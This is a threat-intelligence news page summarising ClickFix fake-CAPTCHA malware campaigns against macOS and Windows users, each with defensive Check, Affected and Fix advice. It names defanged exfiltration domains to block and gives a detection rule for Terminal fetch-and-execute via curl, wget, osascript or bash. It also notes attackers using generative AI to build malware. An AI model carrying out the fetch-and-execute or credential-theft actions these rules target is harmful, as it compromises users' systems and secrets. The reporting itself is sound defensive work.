Last updated: July 5, 2026 at 9:01 AM UTC
All 557 Vulnerability 199 Breach 106 Threat 245 Defense 7
Tag: clickfix (10 articles)Clear

macOS ClickFix attack uses Terminal trick to silently install Atomic Stealer

Palo Alto's Unit 42 found a new macOS campaign that uses the ClickFix trick, a fake CAPTCHA or verification page, to get users to paste a command into Terminal. The command quietly downloads a disk image, mounts it without showing it in Finder, finds the app inside, and launches it, installing the Atomic macOS Stealer (AMOS). The malware then shows a fake system password prompt and steals browser credentials and cookies from many Chromium and Firefox-based browsers, cryptocurrency wallet data, Keychain contents, messaging app data, and documents. The single-command approach is stealthier than older campaigns that relied on the victim manually opening a downloaded image.

Check
Warn Mac users never to paste website-supplied commands into Terminal to pass a CAPTCHA, and watch endpoints for unexpected hdiutil mounts and curl downloads to the /tmp folder.
Affected
macOS users tricked by fake CAPTCHA or verification pages into running a Terminal command; crypto-wallet holders and anyone with browser-stored credentials and Keychain secrets are the main targets.
Fix
Train users to recognize ClickFix lures, restrict or monitor Terminal use on managed Macs, deploy endpoint protection that detects AMOS behavior, and store crypto wallets and secrets in hardware-backed protection.

DriveSurge initial-access broker hijacks thousands of sites for ClickFix and FakeUpdates, routes victims through zTDS pay-per-install network

SilentPush has detailed DriveSurge, a threat actor running large-scale malware-distribution campaigns by compromising thousands of websites and using ClickFix and FakeUpdates social engineering. ClickFix tricks visitors into copying and running malicious commands under the pretense of fixing a technical issue; FakeUpdates uses fraudulent browser-update prompts. DriveSurge operates primarily as an initial-access broker on a pay-per-install model, enabling follow-on attacks by other criminals. Compromised-site visitors are routed through a Traffic Distribution System called zTDS that profiles them before redirecting to malware-delivery infrastructure. The model lets DriveSurge monetize hijacked traffic at scale while downstream actors deploy infostealers, loaders, or ransomware. The campaign overlaps with the broader ClickFix surge across the ecosystem.

Check
Hunt web properties for unauthorized injected redirect scripts and zTDS-related indicators. Train staff that browser-update prompts and 'paste this command to fix' pages are ClickFix/FakeUpdates lures.
Affected
Visitors to thousands of compromised websites redirected through DriveSurge's zTDS. Any organization whose users browse compromised sites can receive infostealers, loaders, or ransomware via pay-per-install.
Fix
Apply SilentPush IoCs and block known zTDS infrastructure. Deploy script-integrity monitoring on your own sites. Disable clipboard-to-terminal workflows; train users never to run commands a webpage supplies.

WithSecure: Russia-linked GREYVIBE targets Ukraine with AI-assisted malware via PhantomMail, PhantomRelay RAT, and ClickFix fake-CAPTCHA chains

WithSecure has attributed persistent attacks against Ukraine and Ukraine-related entities since at least August 2025 to GREYVIBE, a previously undocumented Russian-speaking group operating in the Russian time zone and aligned with Kremlin intelligence interests. Victims span military, government, civilian, and business organizations. The group uses spear-phishing (PhantomMail, delivering JavaScript loaders from Google Drive and 4sync), a PowerShell RAT called PhantomRelay, and ClickFix-style fake-CAPTCHA pages (PhantomClick) impersonating Zoom and a fake adult-club site (PrincessClub). WithSecure describes GREYVIBE as low-to-moderately sophisticated, hampered by repeated OPSEC mistakes, but increasingly relying on generative AI and LLMs to accelerate malware development. Some members have ties to the broader Russian cybercrime ecosystem.

Check
Hunt for PhantomRelay PowerShell RAT activity and JavaScript loaders from Google Drive or 4sync links. Block known GREYVIBE ClickFix domains impersonating Zoom. Apply WithSecure IoCs.
Affected
Ukrainian military, government, civilian, and business organizations and Ukraine-related entities. Delivery via spear-phishing, fake CAPTCHA pages, and fraudulent adult-club websites since August 2025.
Fix
Block GREYVIBE C2 and loader-hosting domains per WithSecure. Restrict PowerShell for standard users. Train staff against ClickFix fake-CAPTCHA 'paste this command' prompts. Monitor Google Drive/4sync archive downloads.

FBI Director Kash Patel's merchandise site (basedapparel.com) infected with WooCommerce ClickFix macOS infostealer; site taken offline

FBI Director Kash Patel's merchandise website basedapparel[.]com was taken offline on Friday after researchers documented a multi-stage WooCommerce compromise that stole payment data and targeted Mac users with a ClickFix attack. The site displayed a fake Cloudflare CAPTCHA prompting visitors to paste a command into their terminal; the macOS-specific shell command then downloaded a script-based infostealer that targets browsers, password vaults, and cryptocurrency wallets before compressing the data, exfiltrating to monterushy[.]com, and deleting itself. Researchers WifiRumHam and 'debbie' analyzed the live campaign on May 21-22; the site went offline on May 22. Similar infections seen across many compromised WooCommerce sites.

Check
Search outbound traffic for connections to monterushy[.]com and similar ClickFix C2 hosts since early May. Inventory WooCommerce sites your organization operates and confirm plugin integrity.
Affected
WooCommerce-powered e-commerce sites with vulnerable or unverified plugins. Mac users who visit compromised storefronts and are prompted to paste shell commands. Brand reputation risk for high-profile site owners.
Fix
Block monterushy[.]com at egress. Audit WooCommerce plugin authenticity via official channels. Train users (especially macOS) to never paste shell commands from a website. Apply EDR rules for ClickFix patterns.

Ghost CMS CVE-2026-26980 SQL injection exploited at scale - 700+ sites including Harvard, Oxford, DuckDuckGo serve ClickFix lures

Qianxin XLab has documented a large-scale ClickFix campaign exploiting CVE-2026-26980, an SQL injection in Ghost CMS that was disclosed and patched on February 19. The vulnerability lets unauthenticated attackers read arbitrary database content including admin API keys, which are then used to inject malicious JavaScript into articles. More than 700 domains are confirmed compromised, including Harvard, Oxford, and Auburn universities and DuckDuckGo. Victim browsers receive a fingerprinted iframe overlay impersonating a Cloudflare prompt that instructs users to paste a command into the Windows command prompt, dropping DLL loaders, JS droppers, or the UtilifySetup.exe Electron-based payload. Two distinct activity clusters compete for compromised sites.

Check
Inventory Ghost CMS sites by version. Search article HTML for unexpected inline JavaScript, iframe overlays, or fake Cloudflare prompts since February 19, 2026. Check admin-API audit logs for suspicious reads.
Affected
Ghost CMS versions 3.24.0 through 6.19.0 with the admin API exposed (default). More than 700 sites confirmed compromised, including major universities and tech companies.
Fix
Upgrade Ghost CMS to 6.19.1 or later. Rotate all admin API keys regardless of compromise status. Apply XLab IoCs and review articles for injected JavaScript. Train editors against ClickFix prompts.

Initial access broker KongTuke pivots from web lures to Microsoft Teams - impersonates IT help desk, drops ModeloRAT in five minutes

ReliaQuest researchers say initial access broker KongTuke has shifted from web-based ClickFix and FileFix lures to Microsoft Teams social engineering, taking as little as five minutes to gain persistent access. The attacker reaches employees from one of five rotating Microsoft 365 tenants, uses Unicode whitespace tricks to make the display name look like internal IT help desk, then talks the victim through pasting a PowerShell command. That command downloads a ZIP from Dropbox containing a portable WinPython runtime and a Python-based RAT called ModeloRAT. The new ModeloRAT variant adds a five-server C2 pool with automatic failover, self-update, and randomized URL paths, and several major EDR products did not detect it.

Check
Search Microsoft 365 audit logs for inbound external Teams chats from new or low-trust tenants, hunt endpoint telemetry for pythonw.exe running from %APPDATA%\WPy64-31401 (or similar WinPython paths), and review PowerShell logs for clipboard-paste-driven commands.
Affected
Any enterprise that accepts inbound Microsoft Teams chats and calls from external tenants, especially help-desk-themed approaches. Initial access broker activity is typically resold to ransomware operators within days of compromise.
Fix
Restrict external Teams chat to allowlisted partners, enforce verified caller display in Teams admin, train staff that real IT never asks for a PowerShell paste, and add EDR rules for portable Python interpreters spawning from %APPDATA%.

North Korean hackers are recording fake Zoom meetings with real crypto executives, then using the footage and AI-generated lookalikes to scam the next target

North Korea's BlueNoroff group has built a self-reinforcing deepfake pipeline that turns each victim into the lure for the next attack. Arctic Wolf documented the pattern: attackers send a Calendly invite that looks like a normal business meeting, then quietly swap the Google Meet link for a typo-squatted Zoom URL. When the target joins, a fake Zoom interface secretly records their webcam feed while a clipboard-injection attack drops malware. The captured footage is mixed with AI-generated lookalikes (built using ChatGPT for synthetic portraits) and recycled into the next attack. Arctic Wolf found 950 files in BlueNoroff's media server. 80% of identified targets are crypto executives.

Check
Brief every executive in your organization that any 'Zoom SDK update' prompt asking them to copy and paste commands into their terminal during a meeting is a North Korean malware drop.
Affected
Cryptocurrency executives, Web3 founders, and CEOs at fintech and blockchain companies - 45% of identified targets are CEOs and founders, 80% are in crypto or adjacent sectors. Anyone whose webcam footage was exfiltrated by BlueNoroff is now appearing as a fake meeting participant targeting their professional network.
Fix
Train executives that any 'SDK update' prompt during a meeting is hostile - real Zoom and Teams never ask users to paste commands into terminals. Verify out-of-band before joining any meeting from an unsolicited Calendly link. Block known BlueNoroff infrastructure (Petrosky Cloud LLC AS400897 and the 80 typosquat domains in Arctic Wolf's IoCs). Consider a dedicated meeting device for high-risk executives.

Lazarus 'Mach-O Man' macOS malware kit hitting fintech and crypto execs through fake Telegram meeting invites and ClickFix terminal commands

ANY.RUN and Dark Reading published research on Mach-O Man, a new macOS malware kit Lazarus is deploying against fintech and crypto executives. The chain begins on Telegram with what looks like a legitimate meeting invite from a known contact, leading to a fake Zoom/Teams/Meet page that displays a fake 'connection issue' and instructs the executive to copy-paste a command into Mac Terminal. That ClickFix command grabs credentials, browser sessions, and Keychain data and exfiltrates over Telegram bot APIs. Lazarus has used the same template across the Drift and KelpDAO compromises, totaling more than $500M stolen in two weeks.

Check
Brief executive, finance, and treasury staff who use Telegram for business communication this week. The lure is a meeting invite from someone they trust, not a cold approach.
Affected
macOS users in executive, finance, business development, and partner-relations roles - particularly those who use Telegram for business. The technique works because the user runs the command themselves, bypassing most preventive controls including macOS endpoint protection. Mach-O Man is not Lazarus-only; other criminal groups have already adopted the kit.
Fix
Train executives never to copy-paste a 'fix' command into Terminal at a meeting page's request, regardless of how legitimate the invite looks. Log and alert on Terminal launches that fetch and execute remote content via curl, wget, osascript, or bash. Hunt for processes in tight infinite loops with Keychain access. Consider Lockdown Mode for high-risk roles.

macOS Tahoe 26.4 blocks ClickFix paste attacks in Terminal - update your Mac fleet now

Apple shipped an undocumented security feature in macOS Tahoe 26.4 that directly targets ClickFix attacks - the social engineering technique behind the Infinity Stealer campaign we covered last week. When a user tries to paste a potentially harmful command into Terminal, macOS now intercepts it with a warning before anything executes. The feature only covers Apple's built-in Terminal app, not third-party alternatives like iTerm2. A 'Paste Anyway' option remains for power users.

Check
Check if your Mac fleet is running macOS Tahoe 26.4 or later.
Affected
Any macOS user on versions prior to 26.4 who may encounter ClickFix social engineering attacks via fake CAPTCHA pages or tech support sites.
Fix
Update to macOS Tahoe 26.4. Push the update via MDM for managed fleets. Train staff to never paste commands from websites into Terminal regardless of the prompt - the protection only covers Terminal.app, not third-party terminals.

New Infinity Stealer malware targets macOS through fake Cloudflare CAPTCHA pages

A new macOS infostealer called Infinity Stealer tricks users through fake Cloudflare CAPTCHA pages - a technique called ClickFix. Victims paste a command into Terminal thinking they're verifying their identity, but it silently installs malware. The payload is compiled with Nuitka - turning Python into native macOS binaries that are much harder for security tools to detect. It steals browser credentials, Keychain data, and crypto wallets.

Check
Alert your team - especially Mac users - to never paste unknown commands into Terminal from websites.
Affected
Any macOS user who encounters a Cloudflare-style CAPTCHA asking them to open Terminal.
Fix
Train staff to recognize fake CAPTCHA pages. Block the domain update-check[.]com. Run endpoint detection on macOS devices.